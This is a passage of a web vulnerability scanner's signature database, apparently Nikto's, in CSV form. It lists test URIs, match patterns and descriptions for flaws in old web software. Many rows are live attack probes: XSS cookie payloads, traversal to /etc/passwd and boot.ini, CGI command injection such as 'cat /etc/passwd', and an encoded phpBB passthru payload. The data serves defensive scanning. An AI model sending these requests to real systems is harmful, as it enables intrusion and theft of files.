([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"Directory indexing found.\",\"\",\"\"\n\"001378\",\"12606\",\"4\",\"/index.php?err=3&email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001379\",\"12607\",\"4\",\"/forgot_password.php?email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001380\",\"12606\",\"4\",\"/bugs/index.php?err=3&email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001381\",\"12607\",\"4\",\"/bugs/forgot_password.php?email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001382\",\"12606\",\"4\",\"/eventum/index.php?err=3&email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001383\",\"12607\",\"4\",\"/eventum/forgot_password.php?email=\\\"><script>alert(document.cookie)</script>\",\"GET\",\"<script>alert\\(document\\.cookie\\)<\\/script>\",\"\",\"\",\"\",\"\",\"MySQL Eventum is vulnerable to XSS in the email field.\",\"\",\"\"\n\"001384\",\"12184\",\"3\",\"/?=PHPB8B5F2A0-3C92-11d3-A3A9-4C7B08C10000\",\"GET\",\"phpinfo\",\"\",\"\",\"\",\"\",\"PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.\",\"\",\"\"\n\"001385\",\"12184\",\"3\",\"/?=PHPE9568F36-D428-11d2-A769-00AA001ACF42\",\"GET\",\"GIF89a\",\"\",\"\",\"\",\"\",\"PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.\",\"\",\"\"\n\"001386\",\"12184\",\"3\",\"/?=PHPE9568F34-D428-11d2-A769-00AA001ACF42\",\"GET\",\"GIF89a\",\"\",\"\",\"\",\"\",\"PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.\",\"\",\"\"\n\"001387\",\"12184\",\"3\",\"/?=PHPE9568F35-D428-11d2-A769-00AA001ACF42\",\"GET\",\"GIF89a\",\"\",\"\",\"\",\"\",\"PHP reveals potentially sensitive information via certain HTTP requests that contain specific QUERY strings.\",\"\",\"\"\n\"001388\",\"11719\",\"89\",\"/index.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001389\",\"11719\",\"89\",\"/viewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001390\",\"11719\",\"89\",\"@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001391\",\"11719\",\"89\",\"@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001392\",\"11719\",\"89\",\"@NUKEviewtopic.php?t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001393\",\"11719\",\"89\",\"/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%64%69%72&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"<DIR>\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001394\",\"11719\",\"89\",\"/index.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"drwx\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001395\",\"11719\",\"89\",\"/index.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"drwx\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001396\",\"11719\",\"89\",\"/viewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"drwx\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001397\",\"11719\",\"89\",\"@NUKEindex.php?name=Forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"drwx\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001398\",\"11719\",\"89\",\"@NUKEindex.php?name=forums&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"drwx\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001399\",\"11719\",\"89\",\"@NUKEviewtopic.php?t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"drwx\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001400\",\"11719\",\"89\",\"/index.php?name=PNphpBB2&file=viewtopic&t=2&rush=%6c%73%20%2d%61%6c&highlight=%2527.%70%61%73%73%74%68%72%75%28%24%48%54%54%50%5f%47%45%54%5f%56%41%52%53%5b%72%75%73%68%5d%29.%2527\",\"GET\",\"drwx\",\"\",\"\",\"\",\"\",\"phpBB is vulnerable to a highlight command execution or SQL injection vulnerability, used by the Santy.A worm.\",\"\",\"\"\n\"001401\",\"136\",\"8\",\"@CGIDIRSphf?Qname=root%0Acat%20/etc/passwd%20\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This allows attackers to read arbitrary files on the system and perhaps execute commands.\",\"\",\"\"\n\"001402\",\"136\",\"8\",\"@CGIDIRSphf.cgi?QALIAS=x%0a/bin/cat%20/etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This allows attackers to read arbitrary files on the system and perhaps execute commands.\",\"\",\"\"\n\"001403\",\"136\",\"8\",\"@CGIDIRSphf\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This allows attackers to read arbitrary files on the system and perhaps execute commands.\",\"\",\"\"\n\"001404\",\"228\",\"0\",\"@CGIDIRSupload.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The upload.cgi allows attackers to upload arbitrary files to the server.\",\"\",\"\"\n\"001405\",\"228\",\"0\",\"/upload.cgi+\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The upload.cgi allows attackers to upload arbitrary files to the server.\",\"\",\"\"\n\"001406\",\"561\",\"3\",\"/server-status\",\"GET\",\"200\",\"Server Version\",\"\",\"\",\"\",\"This reveals Apache information. Comment out appropriate line in the Apache conf file or restrict access to allowed sources.\",\"\",\"\"\n\"001407\",\"119\",\"3\",\"/?PageServices\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.\",\"\",\"\"\n\"001408\",\"119\",\"3\",\"/?wp-cs-dump\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"The remote server may allow directory listings through Web Publisher by forcing the server to show all files via 'open directory browsing'. Web Publisher should be disabled. CVE-1999-0269.\",\"\",\"\"\n\"001409\",\"1193\",\"3\",\"/cfdocs.map\",\"GET\",\"\\.tmp\",\"\",\"\",\"\",\"\",\"Cold Fusion CFCACHE tag places temporary cache files within the web document root, allowing remote attackers to obtain sensitive system information. CVE-2000-0057.\",\"\",\"\"\n\"001410\",\"1264\",\"b\",\"/publisher/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Netscape Enterprise Server with Web Publishing can allow attackers to edit web pages and/or list arbitrary directories via Java applet. CVE-2000-0237.\",\"\",\"\"\n\"001411\",\"127\",\"8\",\"@CGIDIRSnph-publish.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI may allow attackers to execute arbitrary commands on the server.\",\"\",\"\"\n\"001412\",\"128\",\"3\",\"@CGIDIRSnph-test-cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This CGI lets attackers get a directory listing of the CGI directory.\",\"\",\"\"\n\"001413\",\"134\",\"7\",\"/cgi-bin/pfdisplay.cgi?../../../../../../etc/passwd\",\"GET\",\"root:\",\"200\",\"\",\"\",\"\",\"Comes with IRIX 6.2-6.4; allows to run arbitrary commands\",\"\",\"\"\n\"001414\",\"134\",\"7\",\"@CGIDIRSpfdispaly.cgi?'%0A/bin/cat%20/etc/passwd|'\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This allows attackers to execute arbitrary commands on the host.\",\"\",\"\"\n\"001415\",\"134\",\"7\",\"@CGIDIRSpfdispaly.cgi?../../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This allows attackers to read arbitrary files on the host.\",\"\",\"\"\n\"001416\",\"134\",\"7\",\"@CGIDIRSpfdisplay.cgi?'%0A/bin/cat%20/etc/passwd|'\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"This allows attackers to execute arbitrary commands on the host.\",\"\",\"\"\n\"001417\",\"155\",\"6\",\"/counter/1/n/n/0/3/5/0/a/123.gif\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The Roxen Counter may eat up excessive CPU time with image requests.\",\"\",\"\"\n\"001418\",\"2\",\"6\",\"/iissamples/exair/search/search.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Scripts within the Exair package on IIS 4 can be used for a DoS against the server. CVE-1999-0449. BID-193.\",\"\",\"\"\n\"001419\",\"2087\",\"7\",\"@CGIDIRSwebcart/webcart.cgi?CONFIG=mountain&CHANGE=YES&NEXTPAGE=;cat%20/etc/passwd|&CODE=PHOLD\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"webcart.cgi allows remote command execution. Upgrade to the latest version.\",\"\",\"\"\n\"001420\",\"2091\",\"5\",\"/../webserver.ini\",\"GET\",\"Authentic=\",\"\",\"\",\"\",\"\",\"Nuca WebServer allows retrieval of the web server configuration.\",\"\",\"\"\n\"001421\",\"2117\",\"2\",\"/\",\"GET\",\"ESS Launch\",\"\",\"\",\"\",\"\",\"Default IBM TotalStorage server found.\",\"\",\"\"\n\"001422\",\"2117\",\"2\",\"/na_admin/\",\"GET\",\"Network Appliance\",\"\",\"\",\"\",\"\",\"Default Network Appliance server found.\",\"\",\"\"\n\"001423\",\"2117\",\"2\",\"/\",\"GET\",\"Celerra Web Manager\",\"\",\"\",\"\",\"\",\"Default EMC Cellera manager server is running.\",\"\",\"\"\n\"001424\",\"2117\",\"2\",\"/\",\"GET\",\"EMC ControlCenter\",\"\",\"\",\"\",\"\",\"Default EMC ControlCenter manager server is running.\",\"\",\"\"\n\"001425\",\"2117\",\"2\",\"/cpqlogin.htm\",\"GET\",\"System Management Homepage\",\"\",\"\",\"\",\"\",\"Default Compaq/HP WBEM server is running.\",\"\",\"\"\n\"001426\",\"2117\",\"2\",\"/cpqlogin.htm\",\"GET\",\"This is a private system\",\"\",\"\",\"\",\"\",\"Default Compaq/HP WBEM server is running.\",\"\",\"\"\n\"001427\",\"2117\",\"2\",\"/\",\"GET\",\"DHost HTTP Server\",\"\",\"\",\"\",\"\",\"Default Novell NDS iMonitor was found. Default account may be 'sadmin' with no password.\",\"\",\"\"\n\"001428\",\"2117\",\"2\",\"/\",\"GET\",\"AnswerBook\",\"\",\"\",\"\",\"\",\"Default Sun Answerbook server running.\",\"\",\"\"\n\"001429\",\"2117\",\"2\",\"/\",\"GET\",\"Allaire Corporateion\",\"\",\"\",\"\",\"\",\"Default JRun 2 server running.\",\"\",\"\"\n\"001430\",\"2117\",\"2\",\"/\",\"GET\",\"Cisco IP Phone\",\"\",\"\",\"\",\"\",\"Cisco VoIP Phone default web server found.\",\"\",\"\"\n\"001431\",\"2117\",\"2\",\"/\",\"GET\",\"Jaguar CTS\",\"\",\"\",\"\",\"\",\"Default Sybase Jaguar CTS server running.\",\"\",\"\"\n\"001432\",\"2117\",\"2\",\"/\",\"GET\",\"Jrun Management Console\",\"\",\"\",\"\",\"\",\"Default JRun 3 server running.\",\"\",\"\"\n\"001433\",\"2117\",\"2\",\"/\",\"GET\",\"Lantronix\",\"\",\"\",\"\",\"\",\"Default Lantronix printer found.\",\"\",\"\"\n\"001434\",\"2117\",\"2\",\"/\",\"GET\",\"Storage Management\",\"\",\"\",\"\",\"\",\"Default IBM Tivoli Server Administration server is running.\",\"\",\"\"\n\"001435\",\"2117\",\"2\",\"/\",\"GET\",\"Welcome to the JMC\",\"\",\"\",\"\",\"\",\"Default JRun 4 server running.\",\"\",\"\"\n\"001436\",\"2117\",\"2\",\"/\",\"GET\",\"XEROX WORKCENTRE\",\"\",\"\",\"\",\"\",\"Default Xerox WorkCentre server is running.\",\"\",\"\"\n\"001437\",\"2117\",\"2\",\"/\",\"GET\",\"body text=\\\"#000000\\\" bgcolor=\\\"#000000\\\" style=\",\"\",\"\",\"\",\"\",\"Appears to be a default Domino 6 install.\",\"\",\"\"\n\"001438\",\"2117\",\"2\",\"/\",\"GET\",\"Domino 5\",\"\",\"\",\"\",\"\",\"Default Lotus Domino server running.\",\"\",\"\"\n\"001439\",\"2117\",\"2\",\"/\",\"GET\",\"<TITLE>Sambar Server<\\/TITLE>\",\"\",\"\",\"\",\"\",\"Appears to be a default Sambar install.\",\"\",\"\"\n\"001441\",\"2117\",\"2\",\"/\",\"GET\",\"\\(\\?:default Tomcat\\|instead of the website\\)\",\"\",\"\",\"\",\"\",\"Appears to be a default Apache install.\",\"\",\"\"\n\"001442\",\"2117\",\"2\",\"/\",\"GET\",\"Test Page for Apache\",\"\",\"\",\"\",\"\",\"Appears to be a default Apache install.\",\"\",\"\"\n\"001443\",\"2117\",\"2\",\"/\",\"GET\",\"The site you were trying to reach does not currently have a default page\",\"\",\"\",\"\",\"\",\"Appears to be a default IIS install.\",\"\",\"\"\n\"001444\",\"2117\",\"2\",\"/\",\"GET\",\"Welcome to IIS 4\\.0\",\"\",\"\",\"\",\"\",\"Appears to be a default IIS 4.0 install.\",\"\",\"\"\n\"001445\",\"2117\",\"2\",\"/\",\"GET\",\"Welcome to Microsoft Windows NT 4\",\"\",\"\",\"\",\"\",\"Appears to be a default IIS install.\",\"\",\"\"\n\"001446\",\"2117\",\"2\",\"/\",\"GET\",\"Web Server, Enterprise Edition 6\\.0\",\"\",\"\",\"\",\"\",\"Appears to be a default Netscape/iPlanet 6 install.\",\"\",\"\"\n\"001447\",\"2117\",\"b\",\"/main_page.php\",\"GET\",\"mazu\\.css\",\"\",\"\",\"\",\"\",\"Mazu Networks Profiler or Sensor is running.\",\"\",\"\"\n\"001448\",\"2117\",\"b\",\"/\",\"GET\",\"samba is configured to deny\",\"\",\"\",\"\",\"\",\"Samba-swat web server. Used to administer Samba.\",\"\",\"\"\n\"001449\",\"2117\",\"b\",\"/cpanel/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Web-based control panel\",\"\",\"\"\n\"001450\",\"2119\",\"9\",\"/shopexd.asp?catalogid='42\",\"GET\",\"catalogid='42'\",\"\",\"\",\"\",\"\",\"VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CVE-2003-0560, BID-8159\",\"\",\"\"\n\"001451\",\"2119\",\"9\",\"/shopping/diag_dbtest.asp\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"VP-ASP Shopping Cart 5.0 contains multiple SQL injection vulnerabilities. CVE-2003-0560, BID-8159\",\"\",\"\"\n\"001452\",\"2234\",\"3\",\"/_vti_bin/fpcount.exe/\",\"GET\",\"Empty output from CGI program\",\"\",\"\",\"\",\"\",\"The VisNetic WebSite 3.5, Service release 17 reveals system paths when certain non-existing files are requested. See http://www.krusesecurity.dk/advisories/vis0103.txt for more information. CVE-1999-1376. BID-2252.\",\"\",\"\"\n\"001453\",\"2390\",\"4\",\"/forum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Zorum v3.4 and below are vulnerable to XSS attacks.\",\"\",\"\"\n\"001454\",\"2390\",\"4\",\"/zorum/index.php?method=&lt;script&gt;alert('Vulnerable')&lt;/script&gt;\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Zorum v3.4 and below are vulnerable to XSS attacks.\",\"\",\"\"\n\"001455\",\"250\",\"2\",\"/wwwboard/passwd.txt\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"The wwwboard password file is browsable. Change wwwboard to store this file elsewhere, or upgrade to the latest version.\",\"\",\"\"\n\"001456\",\"2562\",\"4\",\"/login/sm_login_screen.php?error=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001457\",\"2562\",\"4\",\"/login/sm_login_screen.php?uid=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001458\",\"2562\",\"4\",\"/SPHERA/login/sm_login_screen.php?error=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001459\",\"2562\",\"4\",\"/SPHERA/login/sm_login_screen.php?uid=\\\"><script>alert('Vulnerable')</script>\",\"GET\",\"<script>alert\\('Vulnerable'\\)<\\/script>\",\"\",\"\",\"\",\"\",\"SPHERA HostingDirector and Final User (VDS) Control Panel 1-3 are vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001460\",\"2617\",\"4\",\"/acart2_0/signin.asp?msg=<script>alert(\\\"test\\\")</script>\",\"GET\",\"<script>alert\\(\\\"test\\\"\\)<\\/script>\",\"\",\"\",\"\",\"\",\"Alan Ward A-Cart 2.0 contains several XSS vulnerabilities\",\"\",\"\"\n\"001461\",\"264\",\"3\",\"/ows-bin/perlidlc.bat?&dir\",\"GET\",\"ows-bin:\",\"\",\"\",\"\",\"\",\"The Oracle web listener can be used to execute remote commands. http://www.securiteam.com/windowsntfocus/Oracle_Web_Listener_4_0_x_CGI_vulnerability.html\",\"\",\"\"\n\"001462\",\"2695\",\"b\",\"/photo/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.\",\"\",\"\"\n\"001463\",\"2695\",\"b\",\"/photodata/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.\",\"\",\"\"\n\"001464\",\"2695\",\"b\",\"@CGIDIRSphoto/\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"My Photo Gallery pre 3.6 contains multiple vulnerabilities including directory traversal, unspecified vulnerabilities and remote management interface access.\",\"\",\"\"\n\"001465\",\"271\",\"2\",\"/iissamples/issamples/oop/qfullhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qfullhit.htw&CiRestriction=none&CiHiliteType=Full\",\"GET\",\"This is the formatting page for webhits full highlighting\",\"\",\"\",\"\",\"\",\"All default files should be removed.\",\"\",\"\"\n\"001466\",\"271\",\"2\",\"/iissamples/issamples/oop/qsumrhit.htw?CiWebHitsFile=/iissamples/issamples/oop/qsumrhit.htw&CiRestriction=none&CiHiliteType=Full\",\"GET\",\"This is the formatting page for webhits summary highlighting\\.\",\"\",\"\",\"\",\"\",\"All default files should be removed.\",\"\",\"\"\n\"001467\",\"271\",\"5\",\"/null.htw?CiWebHitsFile=/default.asp%20&CiRestriction=none&CiHiliteType=Full\",\"GET\",\"\\&lt;html\\&gt;\",\"\",\"\",\"\",\"\",\"It is possible to retrieve the source of .asp files or view any file on the system. Install Webhits patch at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp. MS00-006, CVE-2000-0097.\",\"\",\"\"\n\"001468\",\"271\",\"5\",\"/\",\"GET\",\"null\\.htw\\?CiWebHitsFile=\\/default\\.asp\\%20\\&CiRestriction=none\\&CiHiliteType=Full\",\"\",\"\",\"\",\"\",\"It is possible to retrieve the source of .asp files. Install Webhits patch at http://www.microsoft.com/technet/security/bulletin/ms00-006.asp\",\"\",\"\"\n\"001469\",\"2713\",\"4\",\"/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts. CVE-2000-0540. BID-1386.\",\"\",\"\"\n\"001470\",\"2713\",\"4\",\"/jsp/jspsamp/jspexamples/viewsource.jsp?source=/../../../../../../../../../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"The JRUN view_source.jsp allows arbitrary file retrieval from the host. Upgrade to JRUN 2.3.3 or higher, or remove all default scripts. CVE-2000-0540. BID-1386.\",\"\",\"\"\n\"001471\",\"2717\",\"8\",\"@CGIDIRSinclude/new-visitor.inc.php\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Les Visiteurs 2.0.1 and prior are vulnerable to remote command execution. BID 8902 for exploit example.\",\"\",\"\"\n\"001472\",\"2719\",\"3\",\"/%3f.jsp\",\"GET\",\"WEB-INF\",\"\",\"\",\"\",\"\",\"WebTide allows directory listings by appending %3f.jsp. Upgrade to 7.05 or higher.\",\"\",\"\"\n\"001473\",\"2719\",\"3\",\"/%3f.jsp\",\"GET\",\"WebTide\",\"\",\"\",\"\",\"\",\"WebTide allows directory listings by appending %3f.jsp. Upgrade to 7.05 or higher.\",\"\",\"\"\n\"001474\",\"272\",\"8\",\"/msadc/msadcs.dll\",\"GET\",\"200\",\"\",\"\",\"not authorized\",\"\",\"See RDS advisory RFP9902, CVE-1999-1011, MS98-004, MS99-025 RFP-9902 BID-29 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d1.htm), CIAC J-054 http://www.ciac.org/ciac/bulletins/j-054.shtml www.securityfocus.com/bid/529\",\"\",\"\"\n\"001475\",\"2721\",\"7\",\"../../../../../../../../../../etc/*\",\"GET\",\"passwd\",\"\",\"\",\"\",\"\",\"Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897\",\"\",\"\"\n\"001476\",\"2721\",\"7\",\"../../../../../../../../../../etc/passw*\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"Charles Steinkuehler's LEAF sh-httpd allows remote users to read any file or directory on the system. XF-13519, BID-8897\",\"\",\"\"\n\"001477\",\"2722\",\"7\",\"/bytehoard/index.php?infolder=../../../../../../../../../../../etc/\",\"GET\",\"passwd\",\"\",\"\",\"\",\"\",\"ByteHoard 0.7 is vulnerable to a directory traversal attack. Upgrade to version 0.71 or higher.\",\"\",\"\"\n\"001478\",\"2723\",\"3\",\"/Search\",\"GET\",\"[Ii]ndex [Oo]f \",\"[Dd]irectory [Ll]isting ([Oo]f|[Ff]or) \",\"\",\"\",\"\",\"FirstClass 7.1 server allows file listing of any directory by accessing the /Search url.\",\"\",\"\"\n\"001479\",\"2735\",\"d\",\"/musicqueue.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/\",\"\",\"\"\n\"001480\",\"2735\",\"d\",\"@CGIDIRSmusicqueue.cgi\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Musicqueue 1.20 is vulnerable to a buffer overflow. Ensure the latest version is installed (exploit not attempted). http://musicqueue.sourceforge.net/\",\"\",\"\"\n\"001481\",\"275\",\"3\",\"/scripts/tools/newdsn.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"This can be used to make DSNs, useful in use with an ODBC exploit and the RDS exploit (with msadcs.dll). Also may allow files to be created on the server. BID-1818. CVE-1999-0191. RFP9901 (http://www.wiretrip.net/rfp/p/doc.asp/i2/d3.htm)\",\"\",\"\"\n\"001482\",\"2780\",\"7\",\"/OpenFile.aspx?file=../../../../../../../../../../boot.ini\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"HTTP Commander 4.0 allows directory traversal and reading of arbitrary files.\",\"\",\"\"\n\"001483\",\"279\",\"7\",\"@CGIDIRSwindmail\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions are vulnerable. Request 'windmail?-n%20c:\\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file\",\"\",\"\"\n\"001484\",\"279\",\"7\",\"@CGIDIRSwindmail.exe\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"Some versions are vulnerable. Request 'windmail.exe?-n%20c:\\boot.ini%20you@youraddress.com' (replace your address) and see if you get the boot.ini file\",\"\",\"\"\n\"001485\",\"279\",\"7\",\"@CGIDIRSWINDMAIL.EXE?%20-n%20c:\\boot.ini%\",\"GET\",\"boot loader\",\"\",\"\",\"\",\"\",\"WINDMAIL.EXE can read arbitrary files\",\"\",\"\"\n\"001486\",\"279\",\"7\",\"@CGIDIRSWINDMAIL.EXE?%20-n%20c:\\boot.ini%20Hacker@hax0r.com%20|%20dir%20c:\\\\\",\"GET\",\"200\",\"\",\"\",\"\",\"\",\"WINDMAIL.EXE can read arbitrary files\",\"\",\"\"\n\"001487\",\"2790\",\"4\",\"/index.php?vo=\\\"><script>alert(document.cookie);</script>\",\"GET\",\"><script>alert\\(document\\.cookie\\);<\\/script>\",\"\",\"\",\"\",\"\",\"Ralusp Sympoll 1.5 is vulnerable to Cross Site Scripting (XSS). CA-2000-02.\",\"\",\"\"\n\"001488\",\"2793\",\"7\",\"/.../.../.../.../.../.../.../.../.../.../etc/passwd\",\"GET\",\"root:\",\"\",\"\",\"\",\"\",\"TelCondex SimpleWebserver 2.13.31027 and below allows directory 